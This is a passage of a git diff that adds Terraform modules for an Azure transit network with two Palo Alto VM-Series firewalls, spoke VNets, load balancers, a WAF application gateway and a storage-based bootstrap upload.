+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <log-settings>
+      <profiles/>
+    </log-settings>
+  </shared>
+</config>
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt
new file mode 100644
index 00000000..44878949
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt
@@ -0,0 +1,9 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes
new file mode 100644
index 00000000..e69de29b
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore
new file mode 100644
index 00000000..c96a04f0
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore
@@ -0,0 +1,2 @@
+*
+!.gitignore
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_common.tf b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf
new file mode 100644
index 00000000..e35b4dd1
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf
@@ -0,0 +1,134 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create resource group for FWs, FW NICs, and FW LBs
+
+resource "azurerm_resource_group" "common_fw" {
+  name     = "${var.global_prefix}-${var.fw_prefix}-rg"
+  location = var.location
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create storage account and file share for bootstrapping
+
+resource "random_string" "main" {
+  length      = 15
+  min_lower   = 5
+  min_numeric = 10
+  special     = false
+}
+
+resource "azurerm_storage_account" "main" {
+  name                     = random_string.main.result
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+  location                 = azurerm_resource_group.common_fw.location
+  resource_group_name      = azurerm_resource_group.common_fw.name
+}
+
+module "common_fileshare" {
+  source               = "./modules/azure_bootstrap/"
+  name                 = "${var.fw_prefix}-bootstrap"
+  quota                = 1
+  storage_account_name = azurerm_storage_account.main.name
+  storage_account_key  = azurerm_storage_account.main.primary_access_key
+  local_file_path        = "bootstrap_files/"
+}
+
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create VM-Series.  For every fw_name entered, an additional VM-Series instance will be deployed.
+
+module "common_fw" {
+  source                    = "./modules/vmseries/"
+  name                      = "${var.fw_prefix}-vm"
+  vm_count                  = var.fw_count
+  username                  = var.fw_username
+  password                  = var.fw_password
+  panos                     = var.fw_panos
+  license                   = var.fw_license
+  nsg_prefix                = var.fw_nsg_prefix
+  avset_name                = "${var.fw_prefix}-avset"
+  subnet_mgmt               = module.vnet.vnet_subnets[0]
+  subnet_untrust            = module.vnet.vnet_subnets[1]
+  subnet_trust              = module.vnet.vnet_subnets[2]
+  nic0_public_ip            = true
+  nic1_public_ip            = true
+  nic2_public_ip            = false
+  nic1_backend_pool_ids     = [module.common_extlb.backend_pool_id]
+  nic2_backend_pool_ids     = [module.common_intlb.backend_pool_id]
+  bootstrap_storage_account = azurerm_storage_account.main.name
+  bootstrap_access_key      = azurerm_storage_account.main.primary_access_key
+  bootstrap_file_share      = module.common_fileshare.file_share_name
+  bootstrap_share_directory = "None"
+  location                  = var.location
+  resource_group_name       = azurerm_resource_group.common_fw.name
+  dependencies = [
+    module.common_fileshare.completion
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create public load balancer.  Load balancer uses firewall's untrust interfaces as its backend pool.
+
+module "common_extlb" {
+  source                  = "./modules/lb/"
+  name                    = "${var.fw_prefix}-public-lb"
+  type                    = "public"
+  sku                     = "Standard"
+  probe_ports             = [22]
+  frontend_ports          = [80, 22, 443]
+  backend_ports           = [80, 22, 443]
+  protocol                = "Tcp"
+  location                = var.location
+  resource_group_name     = azurerm_resource_group.common_fw.name
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool
+
+module "common_intlb" {
+  source                  = "./modules/lb/"
+  name                    = "${var.fw_prefix}-internal-lb"
+  type                    = "private"
+  sku                     = "Standard"
+  probe_ports             = [22]
+  frontend_ports          = [0]
+  backend_ports           = [0]
+  protocol                = "All"
+  subnet_id               = module.vnet.vnet_subnets[2]
+  private_ip_address      = var.fw_internal_lb_ip
+  location                = var.location
+  resource_group_name     = azurerm_resource_group.common_fw.name
+}
+
+# Create Application Gateway. Load balancer uses firewall's untrust interface IPs as its backend pool
+
+module "common_appgw" {
+  source                  = "./modules/appgw/"
+  location                = var.location
+  resource_group_name     = azurerm_resource_group.common_fw.name
+  subnet_appgw            = module.vnet.vnet_subnets[3]
+  fw_private_ips          = module.common_fw.nic1_private_ip
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Outputs to terminal
+
+output AppGW {
+  value = "http://${module.common_appgw.appgw_fqdn}"
+}
+
+output EXT-LB {
+  value = "http://${module.common_extlb.public_ip[0]}"
+}
+
+output MGMT-FW1 {
+  value = "https://${module.common_fw.nic0_public_ip[0]}"
+}
+
+output MGMT-FW2 {
+  value = "https://${module.common_fw.nic0_public_ip[1]}"
+}
+
+output SSH-TO-SPOKE2 {
+  value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}"
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf
new file mode 100644
index 00000000..4ee6701d
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf
@@ -0,0 +1,16 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create Transit VNET
+resource "azurerm_resource_group" "transit" {
+  name     = "${var.global_prefix}-${var.transit_prefix}-rg"
+  location = var.location
+}
+
+module "vnet" {
+  source              = "./modules/vnet/"
+  name                = "${var.transit_prefix}-vnet"
+  address_space       = var.transit_vnet_cidr
+  subnet_names        = var.transit_subnet_names
+  subnet_prefixes     = var.transit_subnet_cidrs
+  location            = var.location
+  resource_group_name = azurerm_resource_group.transit.name
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/images/diagram.png b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png
new file mode 100644
index 00000000..45f1d146
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png
new file mode 100644
index 00000000..afd57343
Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png differ
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf
new file mode 100644
index 00000000..202714da
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf
@@ -0,0 +1,75 @@
+#### AppGW2 ####
+resource "random_id" "storage_account" {
+  byte_length = 2
+}
+
+resource "azurerm_public_ip" "appgw" {
+  name                = "appgw"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  domain_name_label   = "appgw-${lower(random_id.storage_account.hex)}"
+  allocation_method   = "Dynamic"
+}
+
+resource "azurerm_application_gateway" "appgw" {
+  name                = "appgw"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+
+  sku {
+    name = "WAF_Medium"
+    tier = "WAF"
+    capacity = 2
+  }
+
+  waf_configuration {
+    enabled = "true"
+    firewall_mode = "Prevention"
+    rule_set_type = "OWASP"
+    rule_set_version = "3.0"
+  }
+
+  gateway_ip_configuration {
+    name = "appgw"
+    subnet_id = var.subnet_appgw
+  }
+
+  frontend_port {
+    name = "http"
+    port = 80
+  }
+
+  frontend_ip_configuration {
+    name                 = "appgw"
+    public_ip_address_id = azurerm_public_ip.appgw.id
+  }
+
+  backend_address_pool {
+    name = "BackendPool"
+    ip_addresses = var.fw_private_ips
+
+  }
+
+  http_listener {
+    name                           = "http"
+    frontend_ip_configuration_name = "appgw"
+    frontend_port_name             = "http"
+    protocol                       = "Http"
+  }
+
+  backend_http_settings {
+    name                  = "http"
+    cookie_based_affinity = "Disabled"
+    port                  = 80
+    protocol              = "Http"
+    request_timeout       = 1
+  }
+
+  request_routing_rule {
+    name                       = "http"
+    rule_type                  = "Basic"
+    http_listener_name         = "http"
+    backend_address_pool_name  = "BackendPool"
+    backend_http_settings_name = "http"
+  }
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf
new file mode 100644
index 00000000..97cb2d85
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf
@@ -0,0 +1,3 @@
+output appgw_fqdn {
+  value = azurerm_public_ip.appgw.fqdn
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf
new file mode 100644
index 00000000..c3dbfab8
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf
@@ -0,0 +1,17 @@
+variable "location" {
+  description = "Location of the resource group to place App Gateway in."
+}
+
+variable "resource_group_name" {
+  description = "Name of the resource group to place App Gateway in."
+}
+
+variable "subnet_appgw" {
+  description = "AppGW Subnet"
+}
+
+variable "fw_private_ips" {
+  description = "list of private IP addresses from the deployed FW"
+  type = list(string)
+  default = null
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf
new file mode 100644
index 00000000..1a5c1f7a
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf
@@ -0,0 +1,40 @@
+
+
+resource "random_string" "randomstring" {
+  length      = 15
+  min_lower   = 5
+  min_numeric = 10
+  special     = false
+}
+
+resource "azurerm_storage_share" "main" {
+  name                 = "${var.name}${random_string.randomstring.result}"
+  storage_account_name = var.storage_account_name
+  quota                = var.quota
+}
+
+resource "null_resource" "upload" {
+provisioner "local-exec" {
+  command = <<EOT
+az storage directory create --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --share-name ${azurerm_storage_share.main.name} --name config
+az storage directory create --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --share-name ${azurerm_storage_share.main.name} --name content
+az storage directory create --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --share-name ${azurerm_storage_share.main.name} --name license
+az storage directory create --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --share-name ${azurerm_storage_share.main.name} --name software
+
+
+az storage file upload-batch --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --destination ${azurerm_storage_share.main.name}/config  --source ${var.local_file_path}config
+az storage file upload-batch --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --destination ${azurerm_storage_share.main.name}/content --source ${var.local_file_path}content
+az storage file upload-batch --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --destination ${azurerm_storage_share.main.name}/license --source ${var.local_file_path}license
+az storage file upload-batch --account-name ${var.storage_account_name} --account-key ${var.storage_account_key} --destination ${azurerm_storage_share.main.name}/software --source ${var.local_file_path}software
+
+
+EOT
+}
+}
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    azurerm_storage_share.main,
+    null_resource.upload
+  ]
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/outputs.tf
new file mode 100644
index 00000000..c4f2c62e
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/outputs.tf
@@ -0,0 +1,7 @@
+output file_share_name {
+  value = azurerm_storage_share.main.name
+}
+
+output "completion" {
+  value = null_resource.dependency_setter.id
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/variables.tf
new file mode 100644
index 00000000..0dbf04b4
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/variables.tf
@@ -0,0 +1,14 @@
+variable storage_account_name {
+}
+
+variable storage_account_key {
+}
+
+variable name {
+}
+
+variable quota {
+}
+
+variable local_file_path {
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/lb/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/lb/main.tf
new file mode 100644
index 00000000..b47aa5ca
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/lb/main.tf
@@ -0,0 +1,51 @@
+resource "azurerm_public_ip" "main" {
+  count               = var.type == "public" ? 1 : 0
+  name                = "${var.name}-pip"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  allocation_method   = "Static"
+  sku                 = var.sku
+}
+
+resource "azurerm_lb" "main" {
+  name                = var.name
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  sku                 = var.sku
+
+  frontend_ip_configuration {
+    name                          = var.frontend_name
+    public_ip_address_id          = var.type == "public" ? join("", azurerm_public_ip.main.*.id) : ""
+    subnet_id                     = var.type == "public" ? "" : var.subnet_id
+    private_ip_address_allocation = var.private_ip_address == "" ? "Dynamic" : "Static"
+    private_ip_address            = var.type == "public" ? "" : var.private_ip_address
+  }
+}
+
+resource "azurerm_lb_backend_address_pool" "main" {
+  name                = var.backend_name
+  resource_group_name = var.resource_group_name
+  loadbalancer_id     = azurerm_lb.main.id
+}
+
+resource "azurerm_lb_probe" "main" {
+  count               = length(var.probe_ports)
+  name                = "${var.probe_name}-${element(var.probe_ports, count.index)}"
+  resource_group_name = var.resource_group_name
+  loadbalancer_id     = azurerm_lb.main.id
+  port                = element(var.probe_ports, count.index)
+}
+
+resource "azurerm_lb_rule" "main" {
+  count                          = length(var.frontend_ports)
+  name                           = "rule-${count.index}"
+  resource_group_name            = var.resource_group_name
+  loadbalancer_id                = azurerm_lb.main.id
+  protocol                       = var.protocol
+  frontend_port                  = element(var.frontend_ports, count.index)
+  backend_port                   = element(var.backend_ports, count.index)
+  frontend_ip_configuration_name = var.frontend_name
+  backend_address_pool_id        = azurerm_lb_backend_address_pool.main.id
+  probe_id                       = element(azurerm_lb_probe.main.*.id, count.index)
+  enable_floating_ip             = var.enable_floating_ip
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/lb/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/lb/outputs.tf
new file mode 100644
index 00000000..14b2ad89
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/lb/outputs.tf
@@ -0,0 +1,11 @@
+output public_ip {
+  value = azurerm_public_ip.main.*.ip_address
+}
+
+output backend_pool_id {
+  value = azurerm_lb_backend_address_pool.main.id
+}
+
+output backend_pool_name {
+  value = azurerm_lb_backend_address_pool.main.name
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/lb/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/lb/variables.tf
new file mode 100644
index 00000000..5c9e84c1
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/lb/variables.tf
@@ -0,0 +1,63 @@
+variable location {
+}
+
+variable resource_group_name {
+}
+
+variable name {
+}
+
+variable private_ip_address {
+  default = ""
+}
+
+variable sku {
+  default = "Standard"
+}
+
+variable enable_floating_ip {
+  default = true
+}
+
+variable subnet_id {
+  default = ""
+}
+
+variable frontend_name {
+  default = "LoadBalancerFrontEnd"
+}
+
+variable backend_name {
+  default = "LoadBalancerBackendPool"
+}
+
+variable frontend_ports {
+  type    = list(string)
+  default = [0]
+}
+
+variable backend_ports {
+  type    = list(string)
+  default = [0]
+}
+
+variable protocol {
+  default = "All"
+}
+
+variable probe_name {
+  default = "HealthProbe"
+}
+
+variable probe_ports {
+  type    = list(string)
+  default = [22]
+}
+
+variable type {
+  default = ""
+}
+
+variable rule_name {
+  default = "HA-Ports"
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/main.tf
new file mode 100644
index 00000000..dfdfcd8c
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/main.tf
@@ -0,0 +1,61 @@
+resource "azurerm_network_security_group" "main" {
+  name                = "${var.name}-nsg"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+}
+
+resource "azurerm_network_interface" "main" {
+  count                     = var.vm_count
+  name                      ="${var.name}${count.index + 1}-nic0"
+  location                  = var.location
+  resource_group_name       = var.resource_group_name
+  network_security_group_id = azurerm_network_security_group.main.id
+
+  ip_configuration {
+    name                          = "ipconfig1"
+    subnet_id                     = var.subnet_id
+    private_ip_address_allocation = "dynamic"
+    load_balancer_backend_address_pools_ids = var.backend_pool_ids
+  }
+}
+
+resource "azurerm_virtual_machine" "main" {
+  count                            = var.vm_count
+  name                             ="${var.name}${count.index + 1}"
+  location                         = var.location
+  resource_group_name              = var.resource_group_name
+  network_interface_ids            = [element(azurerm_network_interface.main.*.id, count.index)]
+  vm_size                          = "Standard_B1s"
+  availability_set_id              = var.availability_set_id
+  delete_os_disk_on_termination    = true
+  delete_data_disks_on_termination = true
+
+  storage_image_reference {
+    publisher = var.publisher
+    offer     = var.offer
+    sku       = var.sku
+    version   = "latest"
+  }
+
+  storage_os_disk {
+    name              = "${var.name}${count.index + 1}"
+    caching           = "ReadWrite"
+    create_option     = "FromImage"
+    managed_disk_type = "Standard_LRS"
+  }
+
+  os_profile {
+    computer_name  = "${var.name}${count.index + 1}"
+    admin_username = var.username
+    admin_password = var.password
+    custom_data    = var.custom_data
+  }
+
+  os_profile_linux_config {
+    disable_password_authentication = false
+  }
+  tags = var.tags
+  depends_on = [
+    azurerm_network_interface.main
+  ]
+}
\ No newline at end of file
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/outputs.tf
new file mode 100644
index 00000000..728812e6
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/outputs.tf
@@ -0,0 +1,4 @@
+output network_interface {
+  value = azurerm_network_interface.main.*.id
+}
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/variables.tf
new file mode 100644
index 00000000..3a8c7cb7
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vm/variables.tf
@@ -0,0 +1,60 @@
+# variable vm_names {
+#   type    = list(string)
+#   default = ["azure-vm"]
+# }
+variable vm_count {
+}
+
+variable name {
+
+}
+
+variable subnet_id {
+}
+
+variable location {
+}
+
+variable resource_group_name {
+}
+
+variable username {
+}
+
+variable password {
+}
+
+variable availability_set_id {
+  default = ""
+}
+
+variable custom_data {
+  default = ""
+}
+
+variable publisher {
+  default = "Canonical"
+}
+
+variable offer {
+  default = "UbuntuServer"
+}
+
+variable sku {
+  default = "16.04-LTS"
+}
+
+variable backend_pool_ids {
+  type = list(string)
+  default = null
+}
+
+variable tags {
+  type = map(string)
+
+  default = {
+    tag1 = ""
+    tag2 = ""
+  }
+}
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/main.tf
new file mode 100644
index 00000000..5fccb231
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/main.tf
@@ -0,0 +1,71 @@
+#-----------------------------------------------------------------------------------------------------------------
+# Create spoke VNET
+resource "azurerm_virtual_network" "main" {
+  name                = var.name
+  location            = var.location
+  address_space       = [var.address_space]
+  resource_group_name = var.resource_group_name
+  dns_servers         = var.dns_servers
+  tags                = var.tags
+}
+
+resource "azurerm_subnet" "main" {
+  count                = length(var.subnet_prefixes)
+  name                 = "${var.name}-subnet${count.index}"
+  virtual_network_name = azurerm_virtual_network.main.name
+  resource_group_name  = var.resource_group_name
+  address_prefix       = var.subnet_prefixes[count.index]
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create peering link between new spoke VNET and transit VNET
+resource "azurerm_virtual_network_peering" "spoke-to-hub" {
+  name                         = "${var.name}-to-${var.remote_vnet_name}"
+  resource_group_name          = var.resource_group_name
+  virtual_network_name         = azurerm_virtual_network.main.name
+  remote_virtual_network_id    = var.remote_vnet_id
+  allow_virtual_network_access = true
+  allow_forwarded_traffic      = true
+  allow_gateway_transit        = false
+  use_remote_gateways          = false
+}
+
+resource "azurerm_virtual_network_peering" "hub-to-spoke" {
+  name                         = "${var.remote_vnet_name}-to-${var.name}"
+  resource_group_name          = var.remote_vnet_rg
+  virtual_network_name         = var.remote_vnet_name
+  remote_virtual_network_id    = azurerm_virtual_network.main.id
+  allow_virtual_network_access = true
+  allow_forwarded_traffic      = true
+  allow_gateway_transit        = false
+  use_remote_gateways          = false
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create route table for subnets with default route to transit virtual appliance
+resource "azurerm_route_table" "main" {
+  name                = "${var.name}-route-table"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+}
+
+resource "azurerm_route" "main" {
+  count                  = length(var.route_table_destinations)
+  name                   = "udr-${count.index}"
+  resource_group_name    = var.resource_group_name
+  route_table_name       = azurerm_route_table.main.name
+  address_prefix         = element(var.route_table_destinations, count.index)
+  next_hop_type          = "VirtualAppliance"
+  next_hop_in_ip_address = element(var.route_table_next_hop, count.index)
+}
+
+resource "azurerm_subnet_route_table_association" "main" {
+  count          = length(var.subnet_prefixes)
+  subnet_id      = element(azurerm_subnet.main.*.id, count.index)
+  route_table_id = azurerm_route_table.main.id
+  depends_on = [
+    azurerm_route_table.main,
+    azurerm_subnet.main,
+  ]
+}
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/outputs.tf
new file mode 100644
index 00000000..82296b21
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/outputs.tf
@@ -0,0 +1,24 @@
+output vnet_id {
+  description = "The id of the newly created vNet"
+  value       = azurerm_virtual_network.main.id
+}
+
+output vnet_name {
+  description = "The Name of the newly created vNet"
+  value       = azurerm_virtual_network.main.name
+}
+
+output vnet_location {
+  description = "The location of the newly created vNet"
+  value       = azurerm_virtual_network.main.location
+}
+
+output vnet_address_space {
+  description = "The address space of the newly created vNet"
+  value       = azurerm_virtual_network.main.address_space
+}
+
+output vnet_subnets {
+  description = "The ids of subnets created inside the newl vNet"
+  value       = azurerm_subnet.main.*.id
+}
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/variables.tf
new file mode 100644
index 00000000..57aa4bd9
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/spoke_vnet/variables.tf
@@ -0,0 +1,59 @@
+variable name {
+  description = "Name of the vnet to create"
+  default     = "vnet"
+}
+
+variable resource_group_name {
+  description = "Default resource group name that the network will be created in."
+  default     = "myapp-rg"
+}
+
+variable location {
+  description = "The location/region where the core network will be created. The full list of Azure regions can be found at https://azure.microsoft.com/regions"
+  default     = "westus"
+}
+
+variable address_space {
+  description = "The address space that is used by the virtual network."
+  default     = "10.0.0.0/16"
+}
+
+# If no values specified, this defaults to Azure DNS 
+variable dns_servers {
+  description = "The DNS servers to be used with vNet."
+  default     = []
+}
+
+variable subnet_prefixes {
+  description = "The address prefix to use for the subnet."
+  default     = ["10.0.1.0/24"]
+}
+
+variable tags {
+  description = "The tags to associate with your network and subnets."
+  type        = map(string)
+
+  default = {
+    tag1 = ""
+    tag2 = ""
+  }
+}
+
+variable remote_vnet_name {
+}
+
+variable remote_vnet_rg {
+}
+
+variable remote_vnet_id {
+}
+
+variable route_table_destinations {
+  type    = list(string)
+  default = ["0.0.0.0/0"]
+}
+
+variable route_table_next_hop {
+  type = list(string)
+}
+
diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/main.tf
new file mode 100644
index 00000000..f0ebbdbd
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/modules/vmseries/main.tf
@@ -0,0 +1,206 @@
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create NSGs for firewall dataplane interfaces (required for Standard SKU LB)
+resource "azurerm_network_security_group" "mgmt" {
+  name                = "${var.name}-nsg-mgmt"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+
+  security_rule {
+    name                       = "mgmt-inbound"
+    priority                   = 1000
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "Tcp"
+    source_port_range          = "*"
+    destination_port_ranges    = ["443", "22"]
+    source_address_prefix      = var.nsg_prefix
+    destination_address_prefix = "*"
+  }
+}
+
+resource "azurerm_network_security_group" "data" {
+  name                = "${var.name}-nsg-data"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+
+  security_rule {
+    name                       = "data-inbound"
+    priority                   = 1000
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "*"
+    source_address_prefix      = "*"
+    destination_address_prefix = "*"
+  }
+
+  security_rule {
+    name                       = "data-outbound"
+    priority                   = 1000
+    direction                  = "Outbound"
+    access                     = "Allow"
+    protocol                   = "*"
+    source_port_range          = "*"
+    destination_port_range     = "*"
+    source_address_prefix      = "*"
+    destination_address_prefix = "*"
+  }
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create public IPs for firewall's management & dataplane1 interface
+resource "azurerm_public_ip" "nic0" {
+  count               = var.nic0_public_ip ? var.vm_count : 0
+  name                = "${var.name}${count.index + 1}-nic0-pip"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  allocation_method   = var.public_ip_address_allocation
+  sku                 = var.sku
+}
+
+resource "azurerm_public_ip" "nic1" {
+  count               = var.nic1_public_ip ? var.vm_count : 0
+  name                = "${var.name}${count.index + 1}-nic1-pip"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  allocation_method   = var.public_ip_address_allocation
+  sku                 = var.sku
+}
+
+resource "azurerm_public_ip" "nic2" {
+  count               = var.nic2_public_ip ? var.vm_count : 0
+  name                = "${var.name}${count.index + 1}-nic2-pip"
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  allocation_method   = var.public_ip_address_allocation
+  sku                 = var.sku
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create firewall interfaces (mgmt, data1, data2).  Dynamic interface is created first, then IP is set statically.
+
+resource "azurerm_network_interface" "nic0" {
+  count                     = var.vm_count
+  name                      = "${var.name}${count.index + 1}-nic0"
+  location                  = var.location
+  resource_group_name       = var.resource_group_name
+  network_security_group_id = azurerm_network_security_group.mgmt.id
+
+  ip_configuration {
+    name                          = "ipconfig1"
+    subnet_id                     = var.subnet_mgmt
+    private_ip_address_allocation = "Dynamic"
+    public_ip_address_id          = var.nic0_public_ip ? element(concat(azurerm_public_ip.nic0.*.id, list("")), count.index) : ""
+
+  }
+}
+
+resource "azurerm_network_interface" "nic1" {
+  count                     = var.vm_count
+  name                      = "${var.name}${count.index + 1}-nic1"
+  location                  = var.location
+  resource_group_name       = var.resource_group_name
+  network_security_group_id = azurerm_network_security_group.data.id
+  enable_ip_forwarding      = true
+  
+  ip_configuration {
+    name                          = "ipconfig1"
+    subnet_id                     = var.subnet_untrust
+    private_ip_address_allocation = "Dynamic"
+    public_ip_address_id          = var.nic1_public_ip ? element(concat(azurerm_public_ip.nic1.*.id, list("")), count.index) : ""
+    load_balancer_backend_address_pools_ids = var.nic1_backend_pool_ids
+  }
+}
+
+resource "azurerm_network_interface" "nic2" {
+  count                     = var.vm_count
+  name                      = "${var.name}${count.index + 1}-nic2"
+  location                  = var.location
+  resource_group_name       = var.resource_group_name
+  network_security_group_id = azurerm_network_security_group.data.id
+  enable_ip_forwarding      = true
+
+  ip_configuration {
+    name                          = "ipconfig1"
+    subnet_id                     = var.subnet_trust
+    private_ip_address_allocation = "Dynamic"
+    public_ip_address_id          = var.nic2_public_ip ? element(concat(azurerm_public_ip.nic2.*.id, list("")), count.index) : ""
+    load_balancer_backend_address_pools_ids = var.nic2_backend_pool_ids
+  }
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Create VM-Series NGFWs
+resource "azurerm_availability_set" "default" {
+  name                = var.avset_name
+  location            = var.location
+  resource_group_name = var.resource_group_name
+  managed             = true
+}
+
